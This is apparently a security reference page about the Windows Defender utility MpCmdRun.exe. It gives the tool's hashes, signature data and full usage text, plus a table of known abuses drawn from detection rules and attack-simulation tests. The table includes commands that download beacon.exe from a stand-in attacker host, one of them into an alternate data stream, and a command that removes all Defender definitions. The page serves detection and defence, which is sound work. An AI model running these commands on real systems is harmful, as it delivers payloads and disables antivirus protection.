MpCmdRun.exe
- File Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2005.5-0\MpCmdRun.exe
- Description: Microsoft Malware Protection Command Line Utility
Hashes
| Type | Hash | 
|---|---|
| MD5 | 0AD495B80DC8BBD7C97284BEF8D86123 | 
| SHA1 | 763FCF47450D7E2B329055F2277859D8E9DD6749 | 
| SHA256 | 6E4414D999EF1D89060889E20F1FCD5A9BC5E4837C75043FD8144EFF42647E6A | 
| SHA384 | C86F586AF9F11FE24F6A8B2288AF6D860DD9E8B6527B7F40A0AF6B2EB174A545B8DDE37D857F9316D1AFBFACCB6EC8E4 | 
| SHA512 | 76924F6565C4D8812E788F0170B25B51702F73C6747321B7AC2CA679E620CB3135243D9D25528AFC8A6B2BB9F7EAD4994348097226153D803FC1E723EBDD225A | 
| SSDEEP | 6144:Xm7QAj62wpzSX/0p7iyiGw+u3Te+9BpwxxKilowQmaX:ZSwpzm/0p7niGwN3qKJX | 
Runtime Data
Usage (stdout):
Microsoft Antimalware Service Command Line Utility (c) 2006-2018 Microsoft Corp
Use this tool to automate and troubleshoot Microsoft Antimalware Service
Usage:
MpCmdRun.exe [command] [-options]
Command Description
   -? / -h                                    Displays all available options
                                              for this tool
   -Scan [-ScanType #] [-File <path> [-DisableRemediation] [-BootSectorScan] [-CpuThrottling]]
         [-Timeout <days>]
         [-Cancel]
         [-ReturnHR]
                                              Scans for malicious software
   -Trace [-Grouping #] [-Level #]            Starts diagnostic tracing
   -GetFiles                                  Collects support information
   -GetFilesDiagTrack                         Same as Getfiles but outputs to 
                                              temporary DiagTrack folder 
   -RemoveDefinitions [-All]                  Restores the installed
                                              signature definitions
                                              to a previous backup copy or to
                                              the original default set of
                                              signatures
                      [-Engine]               Restore the installed engine to
                                              the previous version saved
                      [-DynamicSignatures]    Removes only the dynamically
                                              downloaded signatures
   -SignatureUpdate [-UNC | -MMPC]            Checks for new definition updates
   -Restore  [-ListAll | [[-Name <name>] [-All] | [-FilePath <filePath>]] [-Path <path>]]  Restore or list
                                                               quarantined item(s)
   -AddDynamicSignature [-Path]               Loads a dynamic signature
   -ListAllDynamicSignatures                  List the loaded dynamic signatures
   -RemoveDynamicSignature [-SignatureSetID]  Removes a dynamic signature
   -CheckExclusion -path <path>               Checks whether path is excluded
Additional Information:
Support information will be in the following directory:
C:\ProgramData\Microsoft\Windows Defender\Support
   -Scan [-ScanType value]
        0  Default, according to your configuration
        1  Quick scan
        2  Full system scan
        3  File and directory custom scan
           [-File <path>]
                Indicates the file or directory  to be scanned, only valid for custom scan.
           [-DisableRemediation]
                This option is valid only for custom scan.
                When specified:
                  - File exclusions are ignored.
                  - Archive files are scanned.
                  - Actions are not applied after detection.
                  - Event log entries are not written after detection.
                  - Detections from the custom scan are not displayed in the user interface.
                  - The console output will show the list of detections from the custom scan.
           [-BootSectorScan]
                Enables boot sector scanning; only valid for custom scan.
           [-Timeout <days>]
                Timeout in days; maximum value is 30.
                If this parameter is not specified, default value is 7 days for full scan and 1 day for all other scans.
           [-Cancel]
                Try to cancel any ongoing quick or full scan.
           [-CpuThrottling]
                When specified:
                  - Will ensure that the scan obeys the CPU throttling as defined in the policy (Default 50).
           [-ReturnHR]
                Instead of returning the default 0 or 2 values, return the actual HRESULT of the scan command.
      [DEFAULT]Return code is
      0    if no malware is found or malware is successfully remediated and no additional user action is required
      2    if malware is found and not remediated or additional user action is required to complete remediation or there is error in scanning.  Please check History for more information.
      OR
      HRESULT of the scan command if -ReturnHR was specified
   -Trace [-Grouping value] [-Level value]
        Begins tracing Microsoft Antimalware Service's actions.
        You can specify the components for which tracing is enabled and
        how much information is recorded.
        If no component is specified, all the components will be logged.
        If no level is specified, the Error, Warning and Informational levels
        will be logged. The data will be stored in the support directory
        as a file having the current timestamp in its name and bearing
        the extension BIN.
        [-Grouping]
        0x1    Service
        0x2    Malware Protection Engine
        0x4    User Interface
        0x8    Real-Time Protection
        0x10   Scheduled actions
        0x20   WMI
        0x40   NIS/GAPA
        0x80   Windows Security Center
        0x100  DLP external
        [-Level]
        0x1    Errors
        0x2    Warnings
        0x4    Informational messages
        0x8    Function calls
        0x10   Verbose
        0x20   Performance
   -CaptureNetworkTrace -path <path>
       Captures all the network input into the Network Protection service and 
       saves it to a file at <path>. Supply an empty path to stop tracing
       Note: The specified path must be writable by LocalService
       ex: C:\Users\Public\Downloads 
   -GetFiles
        Gathers the following log files and packages them together in a 
        compressed file in the support directory
        - Any trace files from Microsoft Antimalware Service
        - The Windows Update history log
        - All Microsoft Antimalware Service events from the System event log
        - All relevant Microsoft Antimalware Service registry locations
        - The log file of this tool
        - The log file of the signature update helper tool
   -GetFilesDiagTrack
        Same as GetFiles, but outputs the CAB file to the temp DiagTrack 
        directory
   -RemoveDefinitions
        Restores the last set of signature definitions
        [-Engine]
        Restores the last saved engine
        Use this option to restore the previous engine.
        [-All]
        Removes any installed signature and engine files. Use this 
        option if you have difficulties trying to update signatures.
        [-DynamicSignatures]
        Removes all Dynamic Signatures. 
   -SignatureUpdate
        Checks for new definition updates
        [-UNC [-Path <path>]]
        Performs update directly from UNC file share specified in <path>
        If -Path is not specified, update will be performed directly from the
             preconfigured UNC location
        [-MMPC]
        Performs update directly from Microsoft Malware Protection Center
   -Restore
        [-ListAll]
        List all items that were quarantined
        [-Name <name>]
        Restores the most recently quarantined item based on threat name
        One Threat can map to more than one file
        [-All]
        Restores all the quarantined items based on name
        [-FilePath <filePath>]
        Restores quarantined item based on file path
        [-Path]
        Specify the path where the quarantined items will be restored.
        If not specified, the item will be restored to the original path.
   -AddDynamicSignature -Path <path> 
        Adds a Dynamic Signature specified by <path>
   -ListAllDynamicSignatures
        Lists SignatureSet ID's of all Dynamic Signatures added to the client
        via MAPS and MPCMDRUN -AddDynamicSignature
   -RemoveDynamicSignature -SignatureSetID <SignatureSetID> 
        Removes a Dynamic Signature specified by <SignatureSetID>
   -CheckExclusion -path <path>
        Checks whether <path> is excluded. It can be either a path, or a file.
Signature
- Status: Signature verified.
- Serial: 330000024BB2230A43CD03636200000000024B
- Thumbprint: 50AFF9A191126B5BAD57B29846F3B68D550758CA
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: MpCmdRun.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 4.18.2005.5 (WinBuild.160101.0800)
- Product Version: 4.18.2005.5
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of MpCmdRun.exe being misused. While MpCmdRun.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License | 
|---|---|---|---|
| sigma | image_load_susp_advapi32_dll.yml | Image\|endswith: '\MpCmdRun.exe' | DRL 1.0 | 
| sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | CommandLine\|contains: 'MpCmdRun' | DRL 1.0 | 
| sigma | proc_creation_win_remove_windows_defender_definition_files.yml | OriginalFileName: MpCmdRun.exe | DRL 1.0 | 
| sigma | proc_creation_win_susp_mpcmdrun_download.yml | - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ | DRL 1.0 | 
| sigma | proc_creation_win_susp_mpcmdrun_download.yml | - CommandLine\|contains: 'MpCmdRun.exe' | DRL 1.0 | 
| LOLBAS | MpCmdRun.yml | Name: MpCmdRun.exe | |
| LOLBAS | MpCmdRun.yml | - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe | |
| LOLBAS | MpCmdRun.yml | - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe | |
| LOLBAS | MpCmdRun.yml | - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe | |
| LOLBAS | MpCmdRun.yml | - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe | |
| LOLBAS | MpCmdRun.yml | - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe | |
| LOLBAS | MpCmdRun.yml | - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe | |
| LOLBAS | MpCmdRun.yml | - IOC: MpCmdRun storing data into alternate data streams. | |
| LOLBAS | MpCmdRun.yml | - IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected. | |
| LOLBAS | MpCmdRun.yml | - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. | |
| LOLBAS | MpCmdRun.yml | - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log | |
| malware-ioc | nukesped_lazarus | .MpCmdRun.exe``{:.highlight .language-cmhg} | © ESET 2014-2018 | 
| atomic-red-team | index.md | - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] | MIT License. © 2018 Red Canary | 
| atomic-red-team | windows-index.md | - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1105.md | - Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1105.md | ## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1105.md | More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1105.md | MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path} | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1105.md | del %temp%\MpCmdRun.log >nul 2>&1 | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1562.001.md | Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. | MIT License. © 2018 Red Canary | 
| atomic-red-team | T1562.001.md | “C:\Program Files\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All | MIT License. © 2018 Red Canary | 
| signature-base | apt_golddragon.yar | $s7 = “MpCmdRun.dll” fullword ascii | CC BY-NC 4.0 | 
MIT License. Copyright (c) 2020-2021 Strontic.